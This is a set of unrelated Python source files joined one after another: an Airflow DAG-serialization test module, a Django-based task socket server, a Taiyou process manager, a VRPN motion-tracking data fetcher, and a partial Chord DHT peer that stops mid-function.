"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={
"test_role": {"can_dag_read", "can_dag_edit"}
}
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(task_id='bash_task', bash_command='echo {{ task.task_id }}', owner='airflow')
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
""" Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {
'start_date': datetime(2019, 7, 10)
}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={
'hello': lambda name: 'Hello %s' % name
},
catchup=False
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags():
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue):
"""Validate pickle in a subprocess."""
dags = collect_dags()
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=('{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}')))
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(
serialized_dags['simple_dag'],
serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(
json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"],
key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
self.assertEqual(sorted_serialized_dag(ground_truth_dag),
sorted_serialized_dag(json_dag))
def test_deserialization(self):
"""A serialized DAG can be deserialized in another process."""
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=serialize_subprocess, args=(queue,))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags()
self.assertTrue(set(stringified_dags.keys()) == set(dags.keys()))
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
example_skip_dag = stringified_dags['example_skip_dag']
skip_operator_1_task = example_skip_dag.task_dict['skip_operator_1']
self.validate_deserialized_task(
skip_operator_1_task, 'DummySkipOperator', '#e8b7e4', '#000')
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
self.assertTrue(hasattr(example_skip_dag, 'full_filepath'))
self.assertEqual(example_skip_dag.full_filepath, example_skip_dag.fileloc)
example_subdag_operator = stringified_dags['example_subdag_operator']
section_1_task = example_subdag_operator.task_dict['section-1']
self.validate_deserialized_task(
section_1_task,
SubDagOperator.__name__,
SubDagOperator.ui_color,
SubDagOperator.ui_fgcolor
)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = [
"task_ids", "params", "fileloc", "max_active_runs", "concurrency",
"is_paused_upon_creation", "doc_md", "safe_dag_id", "is_subdag",
"catchup", "description", "start_date", "end_date", "parent_dag",
"template_searchpath", "_access_control"
]
# fields_to_check = dag.get_serialized_fields()
for field in fields_to_check:
self.assertEqual(getattr(serialized_dag, field), getattr(dag, field))
def validate_deserialized_task(self, task, task_type, ui_color, ui_fgcolor):
"""Verify non-airflow operators are casted to BaseOperator."""
self.assertTrue(isinstance(task, SerializedBaseOperator))
# Verify the original operator class is recorded for UI.
self.assertTrue(task.task_type == task_type)
self.assertTrue(task.ui_color == ui_color)
self.assertTrue(task.ui_fgcolor == ui_fgcolor)
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
self.assertIsNotNone(task.subdag)
self.assertTrue(isinstance(task.subdag, DAG))
else:
self.assertIsNone(task.subdag)
self.assertEqual({}, task.params)
self.assertEqual({}, task.executor_config)
@parameterized.expand([
(datetime(2019, 8, 1), None, datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 8, 2), datetime(2019, 8, 2)),
(datetime(2019, 8, 1), datetime(2019, 7, 30), datetime(2019, 8, 1)),
])
def test_deserialization_start_date(self,
dag_start_date,
task_start_date,
expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
@parameterized.expand([
(datetime(2019, 8, 1), None, datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 8, 2), datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 7, 30), datetime(2019, 7, 30)),
])
def test_deserialization_end_date(self,
dag_end_date,
task_end_date,
expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1),
end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand([
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
])
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand([
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}})
])
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val,
start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py.
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py.
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, [
'BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Class for testing purposes: allows creating objects with custom attributes in a single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand([
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(nested1=ClassWithCustomAttributes(att1="{{ task.task_id }}",
att2="{{ task.task_id }}",
template_fields=["att1"]),
nested2=ClassWithCustomAttributes(att3="{{ task.task_id }}",
att4="{{ task.task_id }}",
template_fields=["att3"]),
template_fields=["nested1"]),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', "
"'att4': '{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
])
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses an RCE/security risk etc.)
we want to check that non-"basic" objects are turned into strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization need to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that no new fields have been added to BaseOperator. It also serves
as a reminder that tests should be added for any new field.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual({'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream'}, fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
)
|
server.py
|
from datetime import datetime
from sys import platform
import json
import logging
import socketserver
import multiprocessing
import queue
import threading
from .helpers import load_task
from . import helpers
from django.utils import timezone
import django
log = logging.getLogger(__name__)
def target(queue):
django.setup()
log.info('Worker Starts')
while True:
task_id = queue.get()
if task_id is None:
return
log.info('running task...')
# workaround to solve problems with django + psycopg2
# solution found here: https://stackoverflow.com/a/36580629/10385696
django.db.connection.close()
task = load_task(task_id=task_id)
pickled_task = helpers.unpack(task.pickled_task)
try:
task.started_at = timezone.now()
task.save()
return_value = pickled_task()
task.finished_at = timezone.now()
task.pickled_return = helpers.serialize(return_value)
task.save()
log.info('...successfully')
except Exception as e:
log.exception("...task failed")
task.finished_at = timezone.now()
task.pickled_exception = helpers.serialize(e)
task.save()
class Pool(object):
def __init__(self):
if platform == 'darwin':
# OSX does not support forking
self.queue = queue.Queue()
self.worker = threading.Thread(target=target, args=(self.queue,))
else:
self.queue = multiprocessing.Queue()
self.worker = multiprocessing.Process(target=target, args=(self.queue,))
def stop(self):
self.queue.put(None)
class TaskSocketServer(socketserver.BaseRequestHandler):
DEFAULT_POOL = 'default'
# pools holds a mapping from pool names to process objects
pools = {}
def handle(self):
try:
data = self.request.recv(5000).strip()
# assume a serialized task
log.info('Got a task')
response = None
try:
task_id = int(data.decode())
# Connections are closed by tasks, force a reconnect
django.db.connections.close_all()
task = load_task(task_id=task_id)
# Ensure pool got a worker processing it
pool_name = task.pool or self.DEFAULT_POOL
pool = self.pools.get(pool_name)
if pool is None or not pool.worker.is_alive():
# Spawn new pool
log.info('Spawning new pool: {}'.format(pool_name))
self.pools[pool_name] = Pool()
self.pools[pool_name].worker.start()
self.pools[pool_name].queue.put(task_id)
response = {'task': 'queued', 'task_id': task_id}
except Exception as e:
log.exception("failed to queue task")
response = (False, "TaskServer Put: {}".format(e).encode(),)
response = {
'task': 'failed to queue',
'task_id': task_id,
'error': str(e)
}
self.request.send(json.dumps(response).encode())
except OSError as e:
# in case of network error, just log
log.exception("network error")
@staticmethod
def stop():
for name, pool in TaskSocketServer.pools.items():
print('Stopping pool:', name)
pool.stop()
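# Client-side sketch (the address and port are hypothetical): handle() expects
# the task id as a plain decimal string and replies with a JSON status document.
#   import json, socket
#   with socket.create_connection(('127.0.0.1', 8002)) as s:
#       s.sendall(b'42')
#       print(json.loads(s.recv(5000).decode()))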
|
__init__.py
|
#!/usr/bin/python3.8
# Copyright 2021 Aragubas
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import traceback, importlib, sys, threading
from System import Core
from Library import CorePaths
from Library import CoreUtils as UTILS
from Library import CorePrimitives as Shape
# -- Global Variables -- #
ProcessAccess = list()
ProcessAccess_PID = list()
ProcessNextPID = -1
# -- Create Process Variables -- #
LastProcessWasErrorProcess = False
LastProcess = None
def CreateProcess(Path, ProcessName, pInitArgs=None):
"""
Set the Application Object
:param ApplicationFolder:Folder Path
:return:
"""
global ProcessNextPID
global LastProcessWasErrorProcess
global LastProcess
print("CoreAccess.CreateProcess : Creating Process: [" + ProcessName + "]...")
try:
# Get Process Path
Path = Path.replace("/", CorePaths.TaiyouPath_CorrectSlash)
ProcessIndex = len(ProcessAccess_PID)
ProcessNextPID += 1
# Import Module
Module = importlib.import_module(Core.Get_MainModuleName(Path))
try:
# Get Process Object from Module
ProcessWax = Module.Process(ProcessNextPID, ProcessName, Core.Get_MainModuleName(Path), pInitArgs, ProcessIndex)
except:
# Unload Module
del Module
# Check if module is imported and remove it
if Core.Get_MainModuleName(Path) in sys.modules:
sys.modules.pop(Core.Get_MainModuleName(Path))
UTILS.GarbageCollector_Collect()
# Unload Module
del Module
# Check if module is imported and remove it
if Core.Get_MainModuleName(Path) in sys.modules:
sys.modules.pop(Core.Get_MainModuleName(Path))
UTILS.GarbageCollector_Collect()
# Start process thread with UpdateRequest Function
Thread = threading.Thread(target=ProcessWax.UpdateRequest)
Thread.start()
# Set THIS_THREAD Variable to Process
ProcessWax.THIS_THREAD = Thread
print("CoreAccess.CreateProcess : Process created successfully")
# Return newly created process PID
LastProcessWasErrorProcess = False
LastProcess = None
return ProcessNextPID
except:
print("CoreAccess.CreateProcess : Error while creating process.")
print(traceback.format_exc())
if not LastProcessWasErrorProcess:
LastProcessWasErrorProcess = True
try:
LastProcess.KillProcess(False)
LastProcess = None
except:
print("Core.Main.CreateProcess : Error while trying to kill process")
CreateProcess("System{0}SystemApps{0}crash_dialog".format(CorePaths.TaiyouPath_CorrectSlash), "application_crash", (ProcessName, None, None, 1))
def GetProcesByPID(PID):
try:
return ProcessAccess[ProcessAccess_PID.index(PID)]
except (ValueError, IndexError):
raise Exception("Cannot find process with PID [{0}]".format(PID))
def SendSigKillToProcessByPID(PID):
try:
GetProcesByPID(PID).KillProcess(True)
except ValueError:
print("Process with PID {0} cannot be killed because it was already finished\nor it has been not registred to CoreAccess.".format(PID))
def KillProcessByPID(PID):
global ProcessListChanged
Index = GetProcessIndexByPID(PID)
# Call SIG_KILL Function on Process
ProcessAccess[ProcessAccess_PID.index(PID)].KillProcess(False)
UTILS.GarbageCollector_Collect()
print("Taiyou : Finished process index: " + str(Index))
#ProcessListChanged = True
ClearPreRendered()
def ClearPreRendered():
Shape.ClearPreRendered_Rectangles()
def GetProcessIndexByPID(PID):
try:
return ProcessAccess_PID.index(PID)
except ValueError:
raise ModuleNotFoundError("The process {0} could not be found".format(PID))
def RegisterToCoreAccess(self):
ProcessAccess.append(self)
ProcessAccess_PID.append(self.PID)
def RemoveFromCoreAccess(process):
try:
Index = ProcessAccess_PID.index(process.PID)
ProcessAccess.pop(Index)
ProcessAccess_PID.pop(Index)
except ValueError:
print("Cannot remove process that doesn't exist.")
|
data_fetcher.py
|
import vrpn
import threading
import time
from functools import partial
import config
class DataFetcher(threading.Thread):
daemon = True
def __init__(self, mongo, opti_track_mode=True):
super(DataFetcher, self).__init__()
self.opti_track_mode = opti_track_mode
self.mongo = mongo
self.trackables = list()
self.trackers = []
self.data_runner = None
self.stop = True
self.record_for_study = False
self.study_data = []
self.fat_var = []
#self.mongo_tracking.remove({})
def add_trackable(self, trackable):
self.trackables.append(trackable)
def middle_callback(self, trackable, index, userdata, data):
if self.record_for_study:
self.fat_var.append({"trials." + self.study_data[1] + ".optitrack_data": {"userdata": userdata, "data": data, "index": index, "trackable_name": trackable.machine_name}})
if not self.stop:
trackable.on_data_callback(userdata, data, index)
def get_data_for_study(self, current_study_participant, q_index):
self.record_for_study = True
self.study_data = [current_study_participant, q_index]
self.fat_var = []
def done_with_study_data(self):
self.record_for_study = False
self.study_data = []
return self.fat_var
def unregister_trackers(self):
for tracker in self.trackers:
tracker[0].unregister_change_handler("position", tracker[1], "position")
self.trackers = []
if self.data_runner is not None:
self.data_runner.join()
self.data_runner = None
print("All trackers stopped!")
def register_trackers(self):
if self.opti_track_mode:
for trackable in self.trackables:
for i, tracker in enumerate(trackable.trackables):
print(tracker, i)
tracker_var = vrpn.receiver.Tracker(tracker + "@" + config.OPTITRACK_IP)
handler = partial(self.middle_callback, trackable, i)
tracker_var.register_change_handler("position", handler, "position")
self.trackers.append([tracker_var, handler])
self.data_runner = threading.Thread(target=self.data_fetcher_loop)
self.data_runner.start()
print("All trackers started!")
def data_fetcher_loop(self):
while len(self.trackers) > 0:
if not self.stop:
for tracker in self.trackers:
tracker[0].mainloop()
time.sleep(0.005)
else:
time.sleep(0.1)
# def run(self):
# if self.opti_track_mode:
# while True:
#
# else:
# pickle_data = pickle.load( open( "massive_file.pkl", "rb" ) )
# for x in range(10):
# for data in pickle_data:
# self.hand.on_data_callback('', data)
# time.sleep(0.001)
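# Usage sketch (illustrative): a "trackable" is any object exposing a
# `trackables` list of VRPN tracker names, a `machine_name` and an
# `on_data_callback(userdata, data, index)` method.
#   fetcher = DataFetcher(mongo)
#   fetcher.add_trackable(hand)
#   fetcher.register_trackers()
#   fetcher.stop = False          # data is forwarded only while not stopped
#   ...
#   fetcher.unregister_trackers()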
|
peer.py
|
#!/usr/bin/env python3
"""
Chord peer
==========
This module provides peer of a Chord distributed hash table.
"""
import random
import time
import socket
import socketserver
import threading
import logging
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.DEBUG)
CHAIN = 3
CHORDS = 30
MAX_KEY = 2**CHORDS
CHORD_UPDATE_INTERVAL = 5
class Peer:
def __init__(self, port=4321, key=None):
if key is None:
self.key = random.randint(0, MAX_KEY)
else:
self.key = key
logging.info('Peer key: %x' % self.key)
self.chords = [None] * CHORDS
self.chain = [None]
self.storage = {}
self.port = port
def connect(self, url):
"""
Connects to the DHT using the given `url` (of any connected node).
"""
logging.info('Connecting to: ' + url)
old = self.find_re(self.key, connecting=url)
logging.debug(old)
self.chain = [old] + request(url, 'accept', self.key,
bytes(str(self.port), 'ascii'))
for i in range(CHORDS):
key = (self.key + 2**i) % MAX_KEY
if not inside(key, self.key, old[0]):
self.chords[i] = self.find_re(key, connecting=url)
def accept(self, key, url):
"""
Accepts a peer into the DHT by:
- putting it on the ring after itself
- reassigning to it part of its own key space
"""
self.chain = [(key, url)] + self.chain
# TODO: transfer him the stored keys
for i in range(CHORDS):
key = (self.key + 2**i) % MAX_KEY
if self.chords[i] is None and\
not inside(key, self.key, self.chain[0][0]):
self.chords[i] = self.chain[0]
def start(self):
"""
Starts Peer's operation.
"""
Handler.peer = self
logging.info('Listening on port %d' % self.port)
server = Server(('0.0.0.0', self.port), Handler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
logging.debug('Server thread started')
while True:
time.sleep(CHORD_UPDATE_INTERVAL)
self._update_chords()
def find(self, key):
"""
Find a peer that is closer to the one responsible for the given `key`.
Returns `None` if this peer itself is responsible, or a tuple `(key, url)`.
"""
if self.chain[0] is None or inside(key, self.key, self.chain[0][0]):
return None
for i in range(CHORDS - 1):
if self.chords[i] is None:
continue # I'm still responsible for this part
if inside(key, self.chords[i][0], self.chords[i+1][0]):
return self.chords[i]
if self.chords[-1] is None:
return self.chain[0] # Another funny corner case
else:
return self.chords[-1]
def find_re(self, key, connecting=None):
"""
Find the peer that is responsible for the given `key`.
Returns `None` if this peer itself is responsible, or a tuple `(key, url)`.
"""
if connecting is not None:
closer = (None, connecting)
else:
closer = self.find(key)
if closer is None:
return None
while not isinstance(closer, Me):
closer = request(closer[1], 'find', key)
return closer
def get(self, key):
"""
Return the value for the `key`, wherever it is stored.
"""
responsible = self.find_re(key)
logging.debug('Peer %s responsible for key %x' %
(responsible, key))
if responsible is None:
return self.storage.get(key, None)
else:
return request(responsible[1], 'get', key)
def put(self, key, value):
"""
Store the `(key, value)` in the DHT.
"""
responsible = self.find_re(key)
logging.debug('Peer %s responsible for key %x' %
(responsible, key))
if responsible is None:
self.storage[key] = value
else:
request(responsible[1], 'put', key, value)
def _update_chords(self):
logging.info('Storing %d values' % len(self.storage))
logging.debug(self.chain)
if self.chain[0] is None:
return
logging.debug('Updating chords')
for i in range(CHORDS):
